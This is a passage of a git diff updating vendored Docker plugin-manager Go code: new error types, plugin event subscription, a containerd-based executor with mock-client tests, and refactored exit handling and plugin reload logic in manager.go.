err) + } +} + +func TestAtomicRemoveAllAlreadyExists(t *testing.T) { + dir, err := ioutil.TempDir("", "atomic-remove-already-exists") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir) // just try to make sure this gets cleaned up + + if err := os.MkdirAll(dir+"-removing", 0755); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir + "-removing") + + if err := atomicRemoveAll(dir); err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(dir); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", err) + } + if _, err := os.Stat(dir + "-removing"); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", err) + } +} + +func TestAtomicRemoveAllNotExist(t *testing.T) { + if err := atomicRemoveAll("/not-exist"); err != nil { + t.Fatal(err) + } + + dir, err := ioutil.TempDir("", "atomic-remove-already-exists") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir) // just try 
to make sure this gets cleaned up + + // create the removing dir, but not the "real" one + foo := filepath.Join(dir, "foo") + removing := dir + "-removing" + if err := os.MkdirAll(removing, 0755); err != nil { + t.Fatal(err) + } + + if err := atomicRemoveAll(dir); err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(foo); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", err) + } + if _, err := os.Stat(removing); !os.IsNotExist(err) { + t.Fatalf("dir should be gone: %v", err) + } +} diff --git a/vendor/github.com/docker/docker/plugin/backend_unsupported.go b/vendor/github.com/docker/docker/plugin/backend_unsupported.go index 66e6dab9e8..c0666e858e 100644 --- a/vendor/github.com/docker/docker/plugin/backend_unsupported.go +++ b/vendor/github.com/docker/docker/plugin/backend_unsupported.go @@ -1,15 +1,16 @@ // +build !linux -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( + "context" "errors" "io" "net/http" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" - "github.com/docker/docker/reference" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/filters" ) var errNotSupported = errors.New("plugins are not supported on this platform") @@ -35,7 +36,7 @@ func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHead } // Pull pulls a plugin, check if the correct privileges are provided and install the plugin. 
-func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, out io.Writer) error { +func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, out io.Writer, opts ...CreateOpt) error { return errNotSupported } @@ -45,7 +46,7 @@ func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string } // List displays the list of plugins and associated metadata. -func (pm *Manager) List() ([]types.Plugin, error) { +func (pm *Manager) List(pluginFilters filters.Args) ([]types.Plugin, error) { return nil, errNotSupported } diff --git a/vendor/github.com/docker/docker/plugin/blobstore.go b/vendor/github.com/docker/docker/plugin/blobstore.go index dc9e598e04..a24e7bdf4f 100644 --- a/vendor/github.com/docker/docker/plugin/blobstore.go +++ b/vendor/github.com/docker/docker/plugin/blobstore.go @@ -1,20 +1,24 @@ -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( + "context" + "fmt" "io" "io/ioutil" "os" "path/filepath" + "runtime" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/docker/distribution/xfer" "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" "github.com/docker/docker/pkg/progress" + "github.com/opencontainers/go-digest" + specs "github.com/opencontainers/image-spec/specs-go/v1" "github.com/pkg/errors" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) type blobstore interface { @@ -86,7 +90,7 @@ type insertion struct { } func newInsertion(tempFile *os.File) *insertion { - digester := digest.Canonical.New() + digester := digest.Canonical.Digester() return &insertion{f: tempFile, digester: digester, Writer: io.MultiWriter(tempFile, digester.Hash())} } @@ 
-124,7 +128,7 @@ type downloadManager struct { configDigest digest.Digest } -func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { +func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.RootFS, os string, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { for _, l := range layers { b, err := dm.blobStore.New() if err != nil { @@ -141,8 +145,9 @@ func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.Roo if err != nil { return initialRootFS, nil, err } - digester := digest.Canonical.New() - if _, err := archive.ApplyLayer(dm.tmpDir, io.TeeReader(inflatedLayerData, digester.Hash())); err != nil { + defer inflatedLayerData.Close() + digester := digest.Canonical.Digester() + if _, err := chrootarchive.ApplyLayer(dm.tmpDir, io.TeeReader(inflatedLayerData, digester.Hash())); err != nil { return initialRootFS, nil, err } initialRootFS.Append(layer.DiffID(digester.Digest())) @@ -174,8 +179,12 @@ func (dm *downloadManager) Put(dt []byte) (digest.Digest, error) { } func (dm *downloadManager) Get(d digest.Digest) ([]byte, error) { - return nil, digest.ErrDigestNotFound + return nil, fmt.Errorf("digest not found") } func (dm *downloadManager) RootFSFromConfig(c []byte) (*image.RootFS, error) { return configToRootFS(c) } +func (dm *downloadManager) PlatformFromConfig(c []byte) (*specs.Platform, error) { + // TODO: LCOW/Plugins. This will need revisiting. 
For now use the runtime OS + return &specs.Platform{OS: runtime.GOOS}, nil +} diff --git a/vendor/github.com/docker/docker/plugin/defs.go b/vendor/github.com/docker/docker/plugin/defs.go index 927f639166..31f7c6bcc3 100644 --- a/vendor/github.com/docker/docker/plugin/defs.go +++ b/vendor/github.com/docker/docker/plugin/defs.go @@ -1,16 +1,18 @@ -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "sync" "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/plugin/v2" + "github.com/opencontainers/runtime-spec/specs-go" ) // Store manages the plugin inventory in memory and on-disk type Store struct { sync.RWMutex - plugins map[string]*v2.Plugin + plugins map[string]*v2.Plugin + specOpts map[string][]SpecOpt /* handlers are necessary for transition path of legacy plugins * to the new model. Legacy plugins use Handle() for registering an * activation callback.*/ @@ -18,9 +20,31 @@ type Store struct { } // NewStore creates a Store. -func NewStore(libRoot string) *Store { +func NewStore() *Store { return &Store{ plugins: make(map[string]*v2.Plugin), + specOpts: make(map[string][]SpecOpt), handlers: make(map[string][]func(string, *plugins.Client)), } } + +// SpecOpt is used for subsystems that need to modify the runtime spec of a plugin +type SpecOpt func(*specs.Spec) + +// CreateOpt is used to configure specific plugin details when created +type CreateOpt func(p *v2.Plugin) + +// WithSwarmService is a CreateOpt that flags the passed in a plugin as a plugin +// managed by swarm +func WithSwarmService(id string) CreateOpt { + return func(p *v2.Plugin) { + p.SwarmServiceID = id + } +} + +// WithSpecMounts is a SpecOpt which appends the provided mounts to the runtime spec +func WithSpecMounts(mounts []specs.Mount) SpecOpt { + return func(s *specs.Spec) { + s.Mounts = append(s.Mounts, mounts...) 
+ } +} diff --git a/vendor/github.com/docker/docker/plugin/errors.go b/vendor/github.com/docker/docker/plugin/errors.go new file mode 100644 index 0000000000..44d99b39b2 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/errors.go @@ -0,0 +1,66 @@ +package plugin // import "github.com/docker/docker/plugin" + +import "fmt" + +type errNotFound string + +func (name errNotFound) Error() string { + return fmt.Sprintf("plugin %q not found", string(name)) +} + +func (errNotFound) NotFound() {} + +type errAmbiguous string + +func (name errAmbiguous) Error() string { + return fmt.Sprintf("multiple plugins found for %q", string(name)) +} + +func (name errAmbiguous) InvalidParameter() {} + +type errDisabled string + +func (name errDisabled) Error() string { + return fmt.Sprintf("plugin %s found but disabled", string(name)) +} + +func (name errDisabled) Conflict() {} + +type invalidFilter struct { + filter string + value []string +} + +func (e invalidFilter) Error() string { + msg := "Invalid filter '" + e.filter + if len(e.value) > 0 { + msg += fmt.Sprintf("=%s", e.value) + } + return msg + "'" +} + +func (invalidFilter) InvalidParameter() {} + +type inUseError string + +func (e inUseError) Error() string { + return "plugin " + string(e) + " is in use" +} + +func (inUseError) Conflict() {} + +type enabledError string + +func (e enabledError) Error() string { + return "plugin " + string(e) + " is enabled" +} + +func (enabledError) Conflict() {} + +type alreadyExistsError string + +func (e alreadyExistsError) Error() string { + return "plugin " + string(e) + " already exists" +} + +func (alreadyExistsError) Conflict() {} diff --git a/vendor/github.com/docker/docker/plugin/events.go b/vendor/github.com/docker/docker/plugin/events.go new file mode 100644 index 0000000000..d204340aa7 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/events.go @@ -0,0 +1,111 @@ +package plugin // import "github.com/docker/docker/plugin" + +import ( + "fmt" + "reflect" + + 
"github.com/docker/docker/api/types"
+)
+
+// Event is emitted for actions performed on the plugin manager
+type Event interface {
+ matches(Event) bool
+}
+
+// EventCreate is an event which is emitted when a plugin is created
+// This is either by pull or create from context.
+//
+// Use the `Interfaces` field to match only plugins that implement a specific
+// interface.
+// These are matched against using "or" logic.
+// If no interfaces are listed, all are matched.
+type EventCreate struct {
+ Interfaces map[string]bool
+ Plugin types.Plugin
+}
+
+func (e EventCreate) matches(observed Event) bool {
+ oe, ok := observed.(EventCreate)
+ if !ok {
+ return false
+ }
+ if len(e.Interfaces) == 0 {
+ return true
+ }
+
+ var ifaceMatch bool
+ for _, in := range oe.Plugin.Config.Interface.Types {
+ if e.Interfaces[in.Capability] {
+ ifaceMatch = true
+ break
+ }
+ }
+ return ifaceMatch
+}
+
+// EventRemove is an event which is emitted when a plugin is removed
+// It matches on the passed in plugin's ID only.
+type EventRemove struct {
+ Plugin types.Plugin
+}
+
+func (e EventRemove) matches(observed Event) bool {
+ oe, ok := observed.(EventRemove)
+ if !ok {
+ return false
+ }
+ return e.Plugin.ID == oe.Plugin.ID
+}
+
+// EventDisable is an event that is emitted when a plugin is disabled
+// It matches on the passed in plugin's ID only.
+type EventDisable struct {
+ Plugin types.Plugin
+}
+
+func (e EventDisable) matches(observed Event) bool {
+ oe, ok := observed.(EventDisable)
+ if !ok {
+ return false
+ }
+ return e.Plugin.ID == oe.Plugin.ID
+}
+
+// EventEnable is an event that is emitted when a plugin is enabled
+// It matches on the passed in plugin's ID only. 
+type EventEnable struct { + Plugin types.Plugin +} + +func (e EventEnable) matches(observed Event) bool { + oe, ok := observed.(EventEnable) + if !ok { + return false + } + return e.Plugin.ID == oe.Plugin.ID +} + +// SubscribeEvents provides an event channel to listen for structured events from +// the plugin manager actions, CRUD operations. +// The caller must call the returned `cancel()` function once done with the channel +// or this will leak resources. +func (pm *Manager) SubscribeEvents(buffer int, watchEvents ...Event) (eventCh <-chan interface{}, cancel func()) { + topic := func(i interface{}) bool { + observed, ok := i.(Event) + if !ok { + panic(fmt.Sprintf("unexpected type passed to event channel: %v", reflect.TypeOf(i))) + } + for _, e := range watchEvents { + if e.matches(observed) { + return true + } + } + // If no specific events are specified always assume a matched event + // If some events were specified and none matched above, then the event + // doesn't match + return watchEvents == nil + } + ch := pm.publisher.SubscribeTopicWithBuffer(topic, buffer) + cancelFunc := func() { pm.publisher.Evict(ch) } + return ch, cancelFunc +} diff --git a/vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go new file mode 100644 index 0000000000..8f1c8a4a19 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go @@ -0,0 +1,175 @@ +package containerd // import "github.com/docker/docker/plugin/executor/containerd" + +import ( + "context" + "io" + "path/filepath" + "sync" + "time" + + "github.com/containerd/containerd/cio" + "github.com/containerd/containerd/runtime/linux/runctypes" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/libcontainerd" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// pluginNamespace is the name used for the plugins namespace 
+const pluginNamespace = "plugins.moby"
+
+// ExitHandler represents an object that is called when the exit event is received from containerd
+type ExitHandler interface {
+ HandleExitEvent(id string) error
+}
+
+// Client is used by the executor to perform operations.
+// TODO(@cpuguy83): This should really just be based off the containerd client interface.
+// However right now this whole package is tied to github.com/docker/docker/libcontainerd
+type Client interface {
+ Create(ctx context.Context, containerID string, spec *specs.Spec, runtimeOptions interface{}) error
+ Restore(ctx context.Context, containerID string, attachStdio libcontainerd.StdioCallback) (alive bool, pid int, err error)
+ Status(ctx context.Context, containerID string) (libcontainerd.Status, error)
+ Delete(ctx context.Context, containerID string) error
+ DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error)
+ Start(ctx context.Context, containerID, checkpointDir string, withStdin bool, attachStdio libcontainerd.StdioCallback) (pid int, err error)
+ SignalProcess(ctx context.Context, containerID, processID string, signal int) error
+}
+
+// New creates a new containerd plugin executor
+func New(rootDir string, remote libcontainerd.Remote, exitHandler ExitHandler) (*Executor, error) {
+ e := &Executor{
+ rootDir: rootDir,
+ exitHandler: exitHandler,
+ }
+ client, err := remote.NewClient(pluginNamespace, e)
+ if err != nil {
+ return nil, errors.Wrap(err, "error creating containerd exec client")
+ }
+ e.client = client
+ return e, nil
+}
+
+// Executor is the containerd client implementation of a plugin executor
+type Executor struct {
+ rootDir string
+ client Client
+ exitHandler ExitHandler
+}
+
+// deleteTaskAndContainer deletes plugin task and then plugin container from containerd
+func deleteTaskAndContainer(ctx context.Context, cli Client, id string) {
+ _, _, err := cli.DeleteTask(ctx, id)
+ if err != nil && !errdefs.IsNotFound(err) {
+ 
logrus.WithError(err).WithField("id", id).Error("failed to delete plugin task from containerd") + } + + err = cli.Delete(ctx, id) + if err != nil && !errdefs.IsNotFound(err) { + logrus.WithError(err).WithField("id", id).Error("failed to delete plugin container from containerd") + } +} + +// Create creates a new container +func (e *Executor) Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error { + opts := runctypes.RuncOptions{ + RuntimeRoot: filepath.Join(e.rootDir, "runtime-root"), + } + ctx := context.Background() + err := e.client.Create(ctx, id, &spec, &opts) + if err != nil { + status, err2 := e.client.Status(ctx, id) + if err2 != nil { + if !errdefs.IsNotFound(err2) { + logrus.WithError(err2).WithField("id", id).Warn("Received an error while attempting to read plugin status") + } + } else { + if status != libcontainerd.StatusRunning && status != libcontainerd.StatusUnknown { + if err2 := e.client.Delete(ctx, id); err2 != nil && !errdefs.IsNotFound(err2) { + logrus.WithError(err2).WithField("plugin", id).Error("Error cleaning up containerd container") + } + err = e.client.Create(ctx, id, &spec, &opts) + } + } + + if err != nil { + return errors.Wrap(err, "error creating containerd container") + } + } + + _, err = e.client.Start(ctx, id, "", false, attachStreamsFunc(stdout, stderr)) + if err != nil { + deleteTaskAndContainer(ctx, e.client, id) + } + return err +} + +// Restore restores a container +func (e *Executor) Restore(id string, stdout, stderr io.WriteCloser) (bool, error) { + alive, _, err := e.client.Restore(context.Background(), id, attachStreamsFunc(stdout, stderr)) + if err != nil && !errdefs.IsNotFound(err) { + return false, err + } + if !alive { + deleteTaskAndContainer(context.Background(), e.client, id) + } + return alive, nil +} + +// IsRunning returns if the container with the given id is running +func (e *Executor) IsRunning(id string) (bool, error) { + status, err := e.client.Status(context.Background(), id) + return 
status == libcontainerd.StatusRunning, err
+}
+
+// Signal sends the specified signal to the container
+func (e *Executor) Signal(id string, signal int) error {
+ return e.client.SignalProcess(context.Background(), id, libcontainerd.InitProcessName, signal)
+}
+
+// ProcessEvent handles events from containerd
+// All events are ignored except the exit event, which is sent off to the stored handler
+func (e *Executor) ProcessEvent(id string, et libcontainerd.EventType, ei libcontainerd.EventInfo) error {
+ switch et {
+ case libcontainerd.EventExit:
+ deleteTaskAndContainer(context.Background(), e.client, id)
+ return e.exitHandler.HandleExitEvent(ei.ContainerID)
+ }
+ return nil
+}
+
+type rio struct {
+ cio.IO
+
+ wg sync.WaitGroup
+}
+
+func (c *rio) Wait() {
+ c.wg.Wait()
+ c.IO.Wait()
+}
+
+func attachStreamsFunc(stdout, stderr io.WriteCloser) libcontainerd.StdioCallback {
+ return func(iop *cio.DirectIO) (cio.IO, error) {
+ if iop.Stdin != nil {
+ iop.Stdin.Close()
+ // closing stdin shouldn't be needed here, it should never be open
+ panic("plugin stdin shouldn't have been created!")
+ }
+
+ rio := &rio{IO: iop}
+ rio.wg.Add(2)
+ go func() {
+ io.Copy(stdout, iop.Stdout)
+ stdout.Close()
+ rio.wg.Done()
+ }()
+ go func() {
+ io.Copy(stderr, iop.Stderr)
+ stderr.Close()
+ rio.wg.Done()
+ }()
+ return rio, nil
+ }
+}
diff --git a/vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go
new file mode 100644
index 0000000000..e27063b1d8
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go
@@ -0,0 +1,148 @@
+package containerd
+
+import (
+ "context"
+ "io/ioutil"
+ "os"
+ "sync"
+ "testing"
+ "time"
+
+ "github.com/docker/docker/libcontainerd"
+ "github.com/opencontainers/runtime-spec/specs-go"
+ "github.com/pkg/errors"
+ "gotest.tools/assert"
+)
+
+func TestLifeCycle(t *testing.T) {
+ t.Parallel()
+
+ mock := 
newMockClient() + exec, cleanup := setupTest(t, mock, mock) + defer cleanup() + + id := "test-create" + mock.simulateStartError(true, id) + err := exec.Create(id, specs.Spec{}, nil, nil) + assert.Assert(t, err != nil) + mock.simulateStartError(false, id) + + err = exec.Create(id, specs.Spec{}, nil, nil) + assert.Assert(t, err) + running, _ := exec.IsRunning(id) + assert.Assert(t, running) + + // create with the same ID + err = exec.Create(id, specs.Spec{}, nil, nil) + assert.Assert(t, err != nil) + + mock.HandleExitEvent(id) // simulate a plugin that exits + + err = exec.Create(id, specs.Spec{}, nil, nil) + assert.Assert(t, err) +} + +func setupTest(t *testing.T, client Client, eh ExitHandler) (*Executor, func()) { + rootDir, err := ioutil.TempDir("", "test-daemon") + assert.Assert(t, err) + assert.Assert(t, client != nil) + assert.Assert(t, eh != nil) + + return &Executor{ + rootDir: rootDir, + client: client, + exitHandler: eh, + }, func() { + assert.Assert(t, os.RemoveAll(rootDir)) + } +} + +type mockClient struct { + mu sync.Mutex + containers map[string]bool + errorOnStart map[string]bool +} + +func newMockClient() *mockClient { + return &mockClient{ + containers: make(map[string]bool), + errorOnStart: make(map[string]bool), + } +} + +func (c *mockClient) Create(ctx context.Context, id string, _ *specs.Spec, _ interface{}) error { + c.mu.Lock() + defer c.mu.Unlock() + + if _, ok := c.containers[id]; ok { + return errors.New("exists") + } + + c.containers[id] = false + return nil +} + +func (c *mockClient) Restore(ctx context.Context, id string, attachStdio libcontainerd.StdioCallback) (alive bool, pid int, err error) { + return false, 0, nil +} + +func (c *mockClient) Status(ctx context.Context, id string) (libcontainerd.Status, error) { + c.mu.Lock() + defer c.mu.Unlock() + + running, ok := c.containers[id] + if !ok { + return libcontainerd.StatusUnknown, errors.New("not found") + } + if running { + return libcontainerd.StatusRunning, nil + } + return 
libcontainerd.StatusStopped, nil +} + +func (c *mockClient) Delete(ctx context.Context, id string) error { + c.mu.Lock() + defer c.mu.Unlock() + delete(c.containers, id) + return nil +} + +func (c *mockClient) DeleteTask(ctx context.Context, id string) (uint32, time.Time, error) { + return 0, time.Time{}, nil +} + +func (c *mockClient) Start(ctx context.Context, id, checkpointDir string, withStdin bool, attachStdio libcontainerd.StdioCallback) (pid int, err error) { + c.mu.Lock() + defer c.mu.Unlock() + + if _, ok := c.containers[id]; !ok { + return 0, errors.New("not found") + } + + if c.errorOnStart[id] { + return 0, errors.New("some startup error") + } + c.containers[id] = true + return 1, nil +} + +func (c *mockClient) SignalProcess(ctx context.Context, containerID, processID string, signal int) error { + return nil +} + +func (c *mockClient) simulateStartError(sim bool, id string) { + c.mu.Lock() + defer c.mu.Unlock() + if sim { + c.errorOnStart[id] = sim + return + } + delete(c.errorOnStart, id) +} + +func (c *mockClient) HandleExitEvent(id string) error { + c.mu.Lock() + defer c.mu.Unlock() + delete(c.containers, id) + return nil +} diff --git a/vendor/github.com/docker/docker/plugin/manager.go b/vendor/github.com/docker/docker/plugin/manager.go index f260aa61a7..c6f896129b 100644 --- a/vendor/github.com/docker/docker/plugin/manager.go +++ b/vendor/github.com/docker/docker/plugin/manager.go @@ -1,4 +1,4 @@ -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "encoding/json" @@ -8,21 +8,25 @@ import ( "path/filepath" "reflect" "regexp" + "sort" "strings" "sync" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/image" "github.com/docker/docker/layer" - "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/authorization" "github.com/docker/docker/pkg/ioutils" 
"github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/pubsub" + "github.com/docker/docker/pkg/system" "github.com/docker/docker/plugin/v2" - "github.com/docker/docker/reference" "github.com/docker/docker/registry" + "github.com/opencontainers/go-digest" + "github.com/opencontainers/runtime-spec/specs-go" "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) const configFileName = "config.json" @@ -30,9 +34,17 @@ const rootFSFileName = "rootfs" var validFullID = regexp.MustCompile(`^([a-f0-9]{64})$`) -func (pm *Manager) restorePlugin(p *v2.Plugin) error { +// Executor is the interface that the plugin manager uses to interact with for starting/stopping plugins +type Executor interface { + Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error + IsRunning(id string) (bool, error) + Restore(id string, stdout, stderr io.WriteCloser) (alive bool, err error) + Signal(id string, signal int) error +} + +func (pm *Manager) restorePlugin(p *v2.Plugin, c *controller) error { if p.IsEnabled() { - return pm.restore(p) + return pm.restore(p, c) } return nil } @@ -42,22 +54,27 @@ type eventLogger func(id, name, action string) // ManagerConfig defines configuration needed to start new manager. type ManagerConfig struct { Store *Store // remove - Executor libcontainerd.Remote RegistryService registry.Service LiveRestoreEnabled bool // TODO: remove LogPluginEvent eventLogger Root string ExecRoot string + CreateExecutor ExecutorCreator + AuthzMiddleware *authorization.Middleware } +// ExecutorCreator is used in the manager config to pass in an `Executor` +type ExecutorCreator func(*Manager) (Executor, error) + // Manager controls the plugin subsystem. 
type Manager struct { - config ManagerConfig - mu sync.RWMutex // protects cMap - muGC sync.RWMutex // protects blobstore deletions - cMap map[*v2.Plugin]*controller - containerdClient libcontainerd.Client - blobStore *basicBlobStore + config ManagerConfig + mu sync.RWMutex // protects cMap + muGC sync.RWMutex // protects blobstore deletions + cMap map[*v2.Plugin]*controller + blobStore *basicBlobStore + publisher *pubsub.Publisher + executor Executor } // controller represents the manager's control on a plugin. @@ -89,20 +106,17 @@ func NewManager(config ManagerConfig) (*Manager, error) { manager := &Manager{ config: config, } - if err := os.MkdirAll(manager.config.Root, 0700); err != nil { - return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.Root) - } - if err := os.MkdirAll(manager.config.ExecRoot, 0700); err != nil { - return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.ExecRoot) - } - if err := os.MkdirAll(manager.tmpDir(), 0700); err != nil { - return nil, errors.Wrapf(err, "failed to mkdir %v", manager.tmpDir()) + for _, dirName := range []string{manager.config.Root, manager.config.ExecRoot, manager.tmpDir()} { + if err := os.MkdirAll(dirName, 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", dirName) + } } var err error - manager.containerdClient, err = config.Executor.Client(manager) // todo: move to another struct + manager.executor, err = config.CreateExecutor(manager) if err != nil { - return nil, errors.Wrap(err, "failed to create containerd client") + return nil, err } + manager.blobStore, err = newBasicBlobStore(filepath.Join(manager.config.Root, "storage/blobs")) if err != nil { return nil, err @@ -112,6 +126,8 @@ func NewManager(config ManagerConfig) (*Manager, error) { if err := manager.reload(); err != nil { return nil, errors.Wrap(err, "failed to restore plugins") } + + manager.publisher = pubsub.NewPublisher(0, 0) return manager, nil } @@ -119,46 +135,50 @@ func (pm *Manager) tmpDir() 
string { return filepath.Join(pm.config.Root, "tmp") } -// StateChanged updates plugin internals using libcontainerd events. -func (pm *Manager) StateChanged(id string, e libcontainerd.StateInfo) error { - logrus.Debugf("plugin state changed %s %#v", id, e) - - switch e.State { - case libcontainerd.StateExit: - p, err := pm.config.Store.GetV2Plugin(id) - if err != nil { - return err - } - - pm.mu.RLock() - c := pm.cMap[p] - - if c.exitChan != nil { - close(c.exitChan) - } - restart := c.restart - pm.mu.RUnlock() - - os.RemoveAll(filepath.Join(pm.config.ExecRoot, id)) +// HandleExitEvent is called when the executor receives the exit event +// In the future we may change this, but for now all we care about is the exit event. +func (pm *Manager) HandleExitEvent(id string) error { + p, err := pm.config.Store.GetV2Plugin(id) + if err != nil { + return err + } - if p.PropagatedMount != "" { - if err := mount.Unmount(p.PropagatedMount); err != nil { - logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err) - } - propRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") - if err := mount.Unmount(propRoot); err != nil { - logrus.Warn("Could not unmount %s: %v", propRoot, err) - } - } + if err := os.RemoveAll(filepath.Join(pm.config.ExecRoot, id)); err != nil && !os.IsNotExist(err) { + logrus.WithError(err).WithField("id", id).Error("Could not remove plugin bundle dir") + } - if restart { - pm.enable(p, c, true) + pm.mu.RLock() + c := pm.cMap[p] + if c.exitChan != nil { + close(c.exitChan) + c.exitChan = nil // ignore duplicate events (containerd issue #2299) + } + restart := c.restart + pm.mu.RUnlock() + + if restart { + pm.enable(p, c, true) + } else { + if err := mount.RecursiveUnmount(filepath.Join(pm.config.Root, id)); err != nil { + return errors.Wrap(err, "error cleaning up plugin mounts") } } - return nil } +func handleLoadError(err error, id string) { + if err == nil { + return + } + logger := logrus.WithError(err).WithField("id", id) + if 
os.IsNotExist(errors.Cause(err)) { + // Likely some error while removing on an older version of docker + logger.Warn("missing plugin config, skipping: this may be caused due to a failed remove and requires manual cleanup.") + return + } + logger.Error("error loading plugin, skipping") +} + func (pm *Manager) reload() error { // todo: restore dir, err := ioutil.ReadDir(pm.config.Root) if err != nil { @@ -169,9 +189,17 @@ func (pm *Manager) reload() error { // todo: restore if validFullID.MatchString(v.Name()) { p, err := pm.loadPlugin(v.Name()) if err != nil { - return err + handleLoadError(err, v.Name()) + continue } plugins[p.GetID()] = p + } else { + if validFullID.MatchString(strings.TrimSuffix(v.Name(), "-removing")) { + // There was likely some error while removing this plugin, let's try to remove again here + if err := system.EnsureRemoveAll(v.Name()); err != nil { + logrus.WithError(err).WithField("id", v.Name()).Warn("error while attempting to clean up previously removed plugin") + } + } } } @@ -180,12 +208,15 @@ func (pm *Manager) reload() error { // todo: restore var wg sync.WaitGroup wg.Add(len(plugins)) for _, p := range plugins { - c := &controller{} // todo: remove this + c := &controller{exitChan: make(chan bool)} + pm.mu.Lock() pm.cMap[p] = c + pm.mu.Unlock() + go func(p *v2.Plugin) { defer wg.Done() - if err := pm.restorePlugin(p); err != nil { - logrus.Errorf("failed to restore plugin '%s': %s", p.Name(), err) + if err := pm.restorePlugin(p, c); err != nil { + logrus.WithError(err).WithField("id", p.GetID()).Error("Failed to restore plugin") return } @@ -202,28 +233,17 @@ func (pm *Manager) reload() error { // todo: restore // check if we need to migrate an older propagated mount from before // these mounts were stored outside the plugin rootfs if _, err := os.Stat(propRoot); os.IsNotExist(err) { - if _, err := os.Stat(p.PropagatedMount); err == nil { - // make sure nothing is mounted here - // don't care about errors - 
mount.Unmount(p.PropagatedMount) - if err := os.Rename(p.PropagatedMount, propRoot); err != nil { + rootfsProp := filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount) + if _, err := os.Stat(rootfsProp); err == nil { + if err := os.Rename(rootfsProp, propRoot); err != nil { logrus.WithError(err).WithField("dir", propRoot).Error("error migrating propagated mount storage") } - if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil { - logrus.WithError(err).WithField("dir", p.PropagatedMount).Error("error migrating propagated mount storage") - } } } if err := os.MkdirAll(propRoot, 0755); err != nil { logrus.Errorf("failed to create PropagatedMount directory at %s: %v", propRoot, err) } - // TODO: sanitize PropagatedMount and prevent breakout - p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount) - if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil { - logrus.Errorf("failed to create PropagatedMount directory at %s: %v", p.PropagatedMount, err) - return - } } } } @@ -234,7 +254,7 @@ func (pm *Manager) reload() error { // todo: restore if requiresManualRestore { // if liveRestore is not enabled, the plugin will be stopped now so we should enable it if err := pm.enable(p, c, true); err != nil { - logrus.Errorf("failed to enable plugin '%s': %s", p.Name(), err) + logrus.WithError(err).WithField("id", p.GetID()).Error("failed to enable plugin") } } }(p) @@ -243,6 +263,11 @@ func (pm *Manager) reload() error { // todo: restore return nil } +// Get looks up the requested plugin in the store. +func (pm *Manager) Get(idOrName string) (*v2.Plugin, error) { + return pm.config.Store.GetV2Plugin(idOrName) +} + func (pm *Manager) loadPlugin(id string) (*v2.Plugin, error) { p := filepath.Join(pm.config.Root, id, configFileName) dt, err := ioutil.ReadFile(p) @@ -267,7 +292,7 @@ func (pm *Manager) save(p *v2.Plugin) error { return nil } -// GC cleans up unrefrenced blobs. 
